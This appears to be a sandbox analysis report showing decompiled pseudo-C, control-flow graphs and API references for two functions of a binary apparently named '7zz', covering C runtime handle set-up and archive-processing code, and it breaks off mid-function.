                                                                                                                                    control_flow_graph 1165 46fcd7-46fcef call 46bfc5 1168 46fcf1-46fcf8 call 46d03c 1165->1168 1169 46fcf9-46fd09 1165->1169 1168->1169 1171 46fd0f-46fd11 1169->1171 1173 46fd13-46fd2f 1171->1173 1174 46fd31-46fd40 GetStartupInfoA 1171->1174 1173->1171 1175 46fd46-46fd4b 1174->1175 1176 46fe17 1174->1176 1175->1176 1177 46fd51-46fd63 1175->1177 1178 46fe19-46fe29 1176->1178 1179 46fd67-46fd6d 1177->1179 1180 46fd65 1177->1180 1181 46fe2b-46fe31 1178->1181 1182 46fe78 1178->1182 1184 46fdc5-46fdc9 1179->1184 1185 46fd6f 1179->1185 1180->1179 1186 46fe33-46fe36 1181->1186 1187 46fe38-46fe3f 1181->1187 1183 46fe7c-46fe80 1182->1183 1183->1178 1188 46fe82-46fe92 SetHandleCount 1183->1188 1184->1176 1191 46fdcb-46fdd3 1184->1191 1189 46fd74-46fd81 call 46bfc5 1185->1189 1190 46fe42-46fe4e GetStdHandle 1186->1190 1187->1190 1202 46fd83-46fd8c 1189->1202 1203 46fdbf 1189->1203 1193 46fe67-46fe6b 1190->1193 1194 46fe50-46fe59 GetFileType 1190->1194 1195 46fdd5-46fdd9 1191->1195 1196 46fe0d-46fe15 1191->1196 1193->1183 1194->1193 1199 46fe5b-46fe65 1194->1199 1195->1196 1197 46fddb-46fddd 1195->1197 1196->1176 1196->1191 1200 46fddf-46fde8 GetFileType 1197->1200 1201 46fdea-46fe0a 1197->1201 1199->1193 1204 46fe6d-46fe70 1199->1204 1200->1196 1200->1201 1201->1196 1205 46fd92-46fd94 1202->1205 1203->1184 1204->1183 1206 46fe72-46fe76 1204->1206 1207 46fd96-46fdb0 1205->1207 1208 46fdb2-46fdbb 1205->1208 1206->1183 1207->1205 1208->1189 1209 46fdbd 1208->1209 1209->1184
                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E0046FCD7() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = L0046BFC5(0x480);
				if(_t89 == 0) {
					E0046D03C(0x1b);
				}
				 *0x496460 = _t89;
				 *0x496560 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x496460; // 0x2270630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x496460; // 0x2270630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x496560);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x496560 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x496460[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x496464;
					while(1) {
						_t69 = L0046BFC5(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x496560 =  *0x496560 + 0x20;
						__eflags =  *0x496560;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x496560 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x496560; // 0x20
					goto L18;
				}
			}




























                                                                                                                                    0x0046fcea
                                                                                                                                    0x0046fcef
                                                                                                                                    0x0046fcf3
                                                                                                                                    0x0046fcf8
                                                                                                                                    0x0046fcf9
                                                                                                                                    0x0046fcff
                                                                                                                                    0x0046fd09
                                                                                                                                    0x0046fd09
                                                                                                                                    0x0046fd0f
                                                                                                                                    0x0046fd13
                                                                                                                                    0x0046fd17
                                                                                                                                    0x0046fd1a
                                                                                                                                    0x0046fd1e
                                                                                                                                    0x0046fd22
                                                                                                                                    0x0046fd27
                                                                                                                                    0x0046fd2a
                                                                                                                                    0x0046fd2a
                                                                                                                                    0x0046fd35
                                                                                                                                    0x0046fd3b
                                                                                                                                    0x0046fd40
                                                                                                                                    0x0046fe17
                                                                                                                                    0x0046fe17
                                                                                                                                    0x0046fe17
                                                                                                                                    0x0046fe19
                                                                                                                                    0x0046fe19
                                                                                                                                    0x0046fe1f
                                                                                                                                    0x0046fe22
                                                                                                                                    0x0046fe26
                                                                                                                                    0x0046fe29
                                                                                                                                    0x0046fe78
                                                                                                                                    0x0046fe78
                                                                                                                                    0x0046fe78
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fe78
                                                                                                                                    0x0046fe2b
                                                                                                                                    0x0046fe2d
                                                                                                                                    0x0046fe31
                                                                                                                                    0x0046fe3d
                                                                                                                                    0x0046fe3f
                                                                                                                                    0x0046fe3f
                                                                                                                                    0x0046fe33
                                                                                                                                    0x0046fe35
                                                                                                                                    0x0046fe35
                                                                                                                                    0x0046fe49
                                                                                                                                    0x0046fe4b
                                                                                                                                    0x0046fe4e
                                                                                                                                    0x0046fe67
                                                                                                                                    0x0046fe67
                                                                                                                                    0x0046fe50
                                                                                                                                    0x0046fe51
                                                                                                                                    0x0046fe57
                                                                                                                                    0x0046fe59
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fe5b
                                                                                                                                    0x0046fe60
                                                                                                                                    0x0046fe62
                                                                                                                                    0x0046fe65
                                                                                                                                    0x0046fe6d
                                                                                                                                    0x0046fe70
                                                                                                                                    0x0046fe72
                                                                                                                                    0x0046fe72
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fe70
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fe65
                                                                                                                                    0x0046fe7c
                                                                                                                                    0x0046fe7c
                                                                                                                                    0x0046fe7d
                                                                                                                                    0x0046fe7d
                                                                                                                                    0x0046fe92
                                                                                                                                    0x0046fe92
                                                                                                                                    0x0046fd46
                                                                                                                                    0x0046fd49
                                                                                                                                    0x0046fd4b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fd51
                                                                                                                                    0x0046fd53
                                                                                                                                    0x0046fd59
                                                                                                                                    0x0046fd61
                                                                                                                                    0x0046fd63
                                                                                                                                    0x0046fd65
                                                                                                                                    0x0046fd65
                                                                                                                                    0x0046fd67
                                                                                                                                    0x0046fd6d
                                                                                                                                    0x0046fdc5
                                                                                                                                    0x0046fdc5
                                                                                                                                    0x0046fdc7
                                                                                                                                    0x0046fdc9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fdcb
                                                                                                                                    0x0046fdcb
                                                                                                                                    0x0046fdce
                                                                                                                                    0x0046fdd0
                                                                                                                                    0x0046fdd3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fdd5
                                                                                                                                    0x0046fdd7
                                                                                                                                    0x0046fdd9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fddb
                                                                                                                                    0x0046fddd
                                                                                                                                    0x0046fdea
                                                                                                                                    0x0046fdf1
                                                                                                                                    0x0046fdf1
                                                                                                                                    0x0046fdfe
                                                                                                                                    0x0046fe06
                                                                                                                                    0x0046fe0a
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fe0a
                                                                                                                                    0x0046fde0
                                                                                                                                    0x0046fde6
                                                                                                                                    0x0046fde8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fe0d
                                                                                                                                    0x0046fe0d
                                                                                                                                    0x0046fe11
                                                                                                                                    0x0046fe12
                                                                                                                                    0x0046fe13
                                                                                                                                    0x0046fe13
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fd6f
                                                                                                                                    0x0046fd6f
                                                                                                                                    0x0046fd74
                                                                                                                                    0x0046fd79
                                                                                                                                    0x0046fd7e
                                                                                                                                    0x0046fd81
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fd83
                                                                                                                                    0x0046fd83
                                                                                                                                    0x0046fd8a
                                                                                                                                    0x0046fd8c
                                                                                                                                    0x0046fd8c
                                                                                                                                    0x0046fd92
                                                                                                                                    0x0046fd92
                                                                                                                                    0x0046fd94
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fd96
                                                                                                                                    0x0046fd9a
                                                                                                                                    0x0046fd9d
                                                                                                                                    0x0046fda1
                                                                                                                                    0x0046fda7
                                                                                                                                    0x0046fdaa
                                                                                                                                    0x0046fdaa
                                                                                                                                    0x0046fdb2
                                                                                                                                    0x0046fdb5
                                                                                                                                    0x0046fdbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fdbd
                                                                                                                                    0x0046fdbf
                                                                                                                                    0x00000000
                                                                                                                                    0x0046fdbf

                                                                                                                                    APIs
                                                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 0046FD35
                                                                                                                                    • GetFileType.KERNEL32(00000480), ref: 0046FDE0
                                                                                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 0046FE43
                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 0046FE51
                                                                                                                                    • SetHandleCount.KERNEL32 ref: 0046FE88
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                                                                                    • String ID: ddI
                                                                                                                                    • API String ID: 1710529072-3188649337
                                                                                                                                    • Opcode ID: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
                                                                                                                                    • Instruction ID: c6205cd4f5c3ada4982f3df846bf7a0052440ebcd376ac522a15a622ffbc9688
                                                                                                                                    • Opcode Fuzzy Hash: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
                                                                                                                                    • Instruction Fuzzy Hash: B95118715002058BC720CF68E9447667BA0EB21768F25467FC5D2CB2E2FB39984ACB4B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00415420 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1210 415420-41543f __EH_prolog 1211 415441-415448 call 408c73 1210->1211 1212 41544e-415453 1210->1212 1211->1212 1218 41544a 1211->1218 1214 415482 1212->1214 1215 415455-41547b 1212->1215 1217 415485-41548d 1214->1217 1215->1217 1223 41547d 1215->1223 1220 415493-415497 1217->1220 1221 4158a9-415903 call 411bd0 call 4039c0 call 407a18 call 40351a call 40b5c9 1217->1221 1218->1212 1220->1221 1224 41549d-4154a0 1220->1224 1263 415909 1221->1263 1264 415b38-415b4d GetLastError call 415c6d call 406796 1221->1264 1226 415bb9-415bc7 1223->1226 1227 4154a2-4154ac 1224->1227 1228 4154ce-4154d1 1224->1228 1227->1228 1229 4154ae-4154b2 1227->1229 1228->1221 1231 4154d7-4154fa call 404ad0 1228->1231 1229->1228 1232 4154b4-4154bd 1229->1232 1240 415500-415539 call 40b0a0 call 40351a call 40b431 1231->1240 1241 415723-41572b 1231->1241 1232->1228 1235 4154bf-4154c6 call 408a3b 1232->1235 1235->1228 1249 4154c8-4154cc 1235->1249 1267 41553e-415540 1240->1267 1245 415731-415734 1241->1245 1246 415870-41587c call 408604 1241->1246 1247 415743-41577b call 40b0a0 call 40351a call 40b431 1245->1247 1248 415736-41573d 1245->1248 1259 415b73-415b75 1246->1259 1290 4157c6-4157d1 1247->1290 1291 41577d-415786 call 408c9e 1247->1291 1248->1247 1253 415860-41586a 1248->1253 1249->1227 1249->1228 1253->1245 1253->1246 1259->1226 1266 41590e-415912 1263->1266 1270 415b52-415b6e call 407a18 * 2 call 40b154 1264->1270 1266->1270 1271 415918-41591c 1266->1271 1272 415542-415576 GetLastError call 415c6d call 406796 call 407a18 * 2 1267->1272 1273 41557b-415587 1267->1273 1270->1259 1276 415953-4159a7 call 4092a8 call 406796 call 4092a8 call 408e8a 1271->1276 1277 41591e-415922 1271->1277 1349 415714-41571d 1272->1349 1282 4155e0-4155e4 1273->1282 1283 415589-41558d 1273->1283 1352 4159a9-4159c8 call 40862d call 408604 1276->1352 1353 4159cd-415a02 call 40862d call 408604 call 408e8a 1276->1353 1277->1276 1284 415924-41594a 1277->1284 1287 4155e6-4155ff call 415c6d call 406796 1282->1287 1288 41558f-4155c6 call 405b9f call 406796 call 408e8a 1282->1288 1283->1287 1283->1288 1309 415950 1284->1309 1310 415b77-415b79 1284->1310 1333 4156f8-415713 call 407a18 * 2 1287->1333 1345 415604-415637 call 40862d call 408604 call 4150e0 1288->1345 1346 4155c8-4155db call 40862d 1288->1346 1293 4157d3 1290->1293 1294 4157ee-415845 call 405b9f call 415bca call 40862d call 408604 1290->1294 1316 415847-41585f call 407a18 * 2 1291->1316 1317 41578c-415793 GetLastError 1291->1317 1302 4157d8-4157ec call 415c6d call 406796 1293->1302 1294->1316 1367 415881-41588c call 407a18 1294->1367 1302->1316 1309->1276 1325 415b96-415bb7 call 407a18 * 2 call 40b154 1310->1325 1316->1253 1317->1302 1325->1226 1333->1349 1345->1333 1386 41563d-415661 call 405b9f call 408b37 1345->1386 1368 4156f3 call 408604 1346->1368 1349->1240 1349->1241 1382 415ae7-415b32 call 40862d call 408604 call 407a18 call 40351a call 40b5c9 1352->1382 1392 415a04-415a25 call 4150e0 1353->1392 1393 415a2b-415a36 1353->1393 1384 41588f-4158a4 call 407a18 call 408604 1367->1384 1368->1333 1382->1264 1382->1266 1384->1226 1413 415663-415666 1386->1413 1414 41568d-415699 call 406796 1386->1414 1392->1393 1411 415a27 1392->1411 1394 415a44-415a4f 1393->1394 1395 415a38-415a3f 1393->1395 1400 415a51-415a61 call 408b37 1394->1400 1401 415a6c-415a70 1394->1401 1395->1382 1400->1401 1418 415a63-415a69 1400->1418 1408 415a81-415a98 call 40862d call 409500 1401->1408 1409 415a72-415a76 1401->1409 1434 415a9a-415aa7 call 406796 1408->1434 1435 415aac-415add call 415bca 1408->1435 1409->1408 1415 415a78-415a7f 1409->1415 1411->1393 1419 415668-41566d 1413->1419 1420 41567b-41568b 1413->1420 1424 41569e-4156d4 call 415bca 1414->1424 1415->1382 1418->1401 1425 41566e-415679 call 43ac2f 1419->1425 1420->1424 1439 415795-4157c1 call 40862d call 408604 call 407a18 1424->1439 1440 4156da-4156ed call 40862d 1424->1440 1425->1420 1434->1435 1444 415ae3 1435->1444 1445 415b7b-415b93 call 40862d call 408604 1435->1445 1439->1384 1440->1368 1444->1382 1445->1325
                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                    			E00415420(signed int __ecx, intOrPtr __edx) {
				intOrPtr _t314;
				void* _t315;
				signed int _t321;
				signed int _t328;
				signed int _t340;
				signed char _t350;
				intOrPtr _t351;
				signed int _t356;
				signed int _t368;
				signed int _t373;
				signed int _t377;
				signed char _t383;
				signed int _t388;
				signed int _t393;
				signed char _t395;
				signed int _t411;
				intOrPtr _t415;
				signed int _t418;
				signed int _t421;
				signed int _t424;
				intOrPtr _t460;
				signed int _t462;
				signed int _t469;
				signed int _t473;
				signed int _t476;
				intOrPtr _t532;
				void* _t555;
				intOrPtr _t564;
				signed int _t568;
				signed int _t573;
				signed int _t579;
				intOrPtr _t581;
				signed int _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t593;
				void* _t596;

				L0046B890(E0047490E, _t596);
				_t469 = __ecx;
				 *((intOrPtr*)(_t596 - 0x3c)) = __edx;
				 *(_t596 - 0x10) = __ecx;
				if( *(_t596 + 0x18) == 0 && E00408C73(__ecx) != 0) {
					 *(_t596 + 0x18) = 1;
				}
				_t568 =  *(_t596 + 0x1c);
				if(_t568 == 0) {
					_t581 =  *((intOrPtr*)(_t596 + 0x14));
					L7:
					_t314 =  *((intOrPtr*)(_t596 + 0x10));
					_t590 = 0;
					__eflags =  *(_t314 + 8);
					if( *(_t314 + 8) != 0) {
						L53:
						_push(0x2a);
						_t315 = E00411BD0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
						 *(_t596 - 0x78) =  *(_t596 - 0x78) | 0xffffffff;
						 *(_t596 - 4) = 0xd;
						 *(_t596 - 4) = 0xe;
						L004039C0(_t596 - 0x74, _t315);
						 *(_t596 - 4) = 0x10;
						E00407A18( *((intOrPtr*)(_t596 - 0x20)));
						 *(_t596 - 0x38) =  *(_t596 - 0x38) & 0x00000000;
						L0040351A(_t596 - 0xd4);
						_push(_t596 - 0x11);
						 *(_t596 - 4) = 0x11;
						_t321 = L0040B5C9(_t596 - 0xfc);
						__eflags = _t321;
						if(_t321 == 0) {
							L78:
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push( *((intOrPtr*)(_t596 + 0xc)));
							E00406796( *((intOrPtr*)(_t596 + 0x20)));
							L79:
							E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
							_t297 = _t596 - 4;
							 *_t297 =  *(_t596 - 4) | 0xffffffff;
							__eflags =  *_t297;
							E00407A18( *((intOrPtr*)(_t596 - 0x74)));
							E0040B154(_t596 - 0x78);
							L80:
							_t328 = 0;
							L84:
							 *[fs:0x0] =  *((intOrPtr*)(_t596 - 0xc));
							return _t328;
						}
						while(1) {
							__eflags =  *((char*)(_t596 - 0x11));
							if( *((char*)(_t596 - 0x11)) == 0) {
								goto L79;
							}
							__eflags =  *(_t596 + 0x1c);
							if( *(_t596 + 0x1c) == 0) {
								L60:
								_push( *((intOrPtr*)(_t596 + 0x10)));
								 *((char*)(_t596 - 0x40)) =  *(_t596 + 0x18);
								E004092A8(_t596 - 0x34);
								_push(_t596 - 0xd4);
								 *(_t596 - 4) = 0x12;
								E00406796(_t596 - 0x34);
								_push(_t596 - 0x34);
								E004092A8(_t596 - 0x54);
								 *(_t596 - 4) = 0x13;
								_t340 = E00408E8A(_t469, 0, _t596 - 0x54,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
								__eflags = _t340;
								 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
								if(_t340 == 0) {
									 *(_t596 - 4) = 0x16;
									E0040862D();
									 *(_t596 - 4) = 0x12;
									E00408604(_t596 - 0x54);
									__eflags = E00408E8A(_t469, 1, _t596 - 0x34,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
									if(__eflags != 0) {
										_push(_t581 + 0x3c);
										_push(_t596 - 0xfc);
										E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
										_t383 =  *(_t596 - 0xdc) >> 4;
										__eflags = _t383 & 0x00000001;
										if((_t383 & 0x00000001) != 0) {
											 *((char*)(_t596 - 0x40)) = 1;
										}
									}
									_t350 =  *(_t596 - 0xdc) >> 4;
									__eflags = _t350 & 0x00000001;
									if((_t350 & 0x00000001) != 0) {
										_t351 =  *((intOrPtr*)(_t596 + 0x10));
										 *(_t596 - 0x10) =  *(_t596 - 0x10) & 0x00000000;
										__eflags =  *(_t351 + 8);
										if( *(_t351 + 8) == 0) {
											_t377 = E00408B37(_t469, _t596 - 0xd4);
											__eflags = _t377;
											if(_t377 >= 0) {
												 *(_t596 - 0x10) =  *( *((intOrPtr*)(_t469 + 0x1c)) + _t377 * 4);
											}
										}
										__eflags =  *((char*)(_t596 - 0x40));
										if( *((char*)(_t596 - 0x40)) != 0) {
											L73:
											E0040862D();
											_push( *((intOrPtr*)(_t596 + 0x10)));
											E00409500(_t596 - 0x34);
											__eflags =  *(_t596 - 0x10);
											if(__eflags == 0) {
												_push(_t596 - 0xd4);
												 *(_t596 - 0x10) = _t469;
												E00406796(_t596 - 0x34);
											}
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											_push( *(_t596 + 0x1c));
											_push( *((intOrPtr*)(_t596 - 0x40)));
											_push(_t581);
											_push(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0xd4);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t356 = E00415BCA( *(_t596 - 0x10),  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											__eflags = _t356;
											 *(_t596 - 0x10) = _t356;
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											if(_t356 != 0) {
												 *(_t596 - 4) = 0x19;
												E0040862D();
												 *(_t596 - 4) = 0x11;
												E00408604(_t596 - 0x34);
												_t593 =  *(_t596 - 0x10);
												L83:
												E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
												_t308 = _t596 - 4;
												 *_t308 =  *(_t596 - 4) | 0xffffffff;
												__eflags =  *_t308;
												E00407A18( *((intOrPtr*)(_t596 - 0x74)));
												E0040B154(_t596 - 0x78);
												_t328 = _t593;
												goto L84;
											} else {
												 *(_t596 - 4) = 0x1a;
												goto L77;
											}
										} else {
											__eflags =  *(_t596 - 0x10);
											if( *(_t596 - 0x10) != 0) {
												goto L73;
											}
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											 *(_t596 - 4) = 0x18;
											goto L77;
										}
									} else {
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										 *(_t596 - 4) = 0x17;
										L77:
										E0040862D();
										 *(_t596 - 4) = 0x11;
										E00408604(_t596 - 0x34);
										 *(_t596 - 4) = 0x10;
										E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
										 *(_t596 - 0x38) =  *(_t596 - 0x38) + 1;
										L0040351A(_t596 - 0xd4);
										_push(_t596 - 0x11);
										 *(_t596 - 4) = 0x11;
										_t368 = L0040B5C9(_t596 - 0xfc);
										__eflags = _t368;
										if(_t368 != 0) {
											continue;
										}
										goto L78;
									}
								}
								 *(_t596 - 4) = 0x14;
								E0040862D();
								 *(_t596 - 4) = 0x12;
								E00408604(_t596 - 0x54);
								 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
								 *(_t596 - 4) = 0x15;
								goto L77;
							}
							__eflags =  *(_t596 - 0x38) - 0xff;
							if( *(_t596 - 0x38) != 0xff) {
								goto L60;
							}
							_t573 =  *( *(_t596 + 0x1c));
							 *(_t596 - 0x10) = _t573;
							asm("cdq");
							asm("cdq");
							_t373 =  *( *(_t596 - 0x10))( *((intOrPtr*)(_t581 + 8)), _t573,  *((intOrPtr*)(_t581 + 0x44)), _t573,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
							__eflags = _t373;
							if(_t373 != 0) {
								_t593 = _t373;
								goto L83;
							}
							_t581 =  *((intOrPtr*)(_t596 + 0x14));
							goto L60;
						}
						goto L79;
					}
					__eflags =  *(_t596 + 0x18);
					if( *(_t596 + 0x18) != 0) {
						goto L53;
					}
					__eflags =  *(_t469 + 0x2c);
					if( *(_t469 + 0x2c) <= 0) {
						L15:
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 !=  *(_t469 + 0x2c)) {
							goto L53;
						}
						E00404AD0(_t596 - 0x68, 1);
						 *((intOrPtr*)(_t596 - 0x68)) = 0x47ab08;
						 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
						 *(_t596 + 0x18) =  *(_t596 + 0x18) & 0x00000000;
						__eflags =  *(_t469 + 0x2c);
						if( *(_t469 + 0x2c) <= 0) {
							L37:
							_t388 = 0;
							__eflags =  *(_t469 + 0x18);
							 *(_t596 + 0x18) = 0;
							if( *(_t469 + 0x18) <= 0) {
								L50:
								 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
								E00408604(_t596 - 0x68);
								goto L80;
							} else {
								goto L38;
							}
							do {
								L38:
								__eflags = _t388 -  *((intOrPtr*)(_t596 - 0x60));
								if(_t388 >=  *((intOrPtr*)(_t596 - 0x60))) {
									L40:
									_t584 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4));
									_push( *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4)) + 4);
									L0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
									 *(_t596 - 4) = 9;
									L0040351A(_t596 - 0x9c);
									_push( *((intOrPtr*)(_t596 - 0x20)));
									 *(_t596 - 4) = 0xa;
									_t393 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags);
									__eflags = _t393;
									if(_t393 != 0) {
										_t395 =  *(_t596 - 0xa4) >> 4;
										__eflags = _t395 & 0x00000001;
										if((_t395 & 0x00000001) != 0) {
											E00405B9F(_t596 - 0x54);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											 *(_t596 - 4) = 0xb;
											_push( *(_t596 + 0x1c));
											_push(0);
											_push( *((intOrPtr*)(_t596 + 0x14)));
											_push(_t596 - 0x54);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0x9c);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t585 = E00415BCA(_t584,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
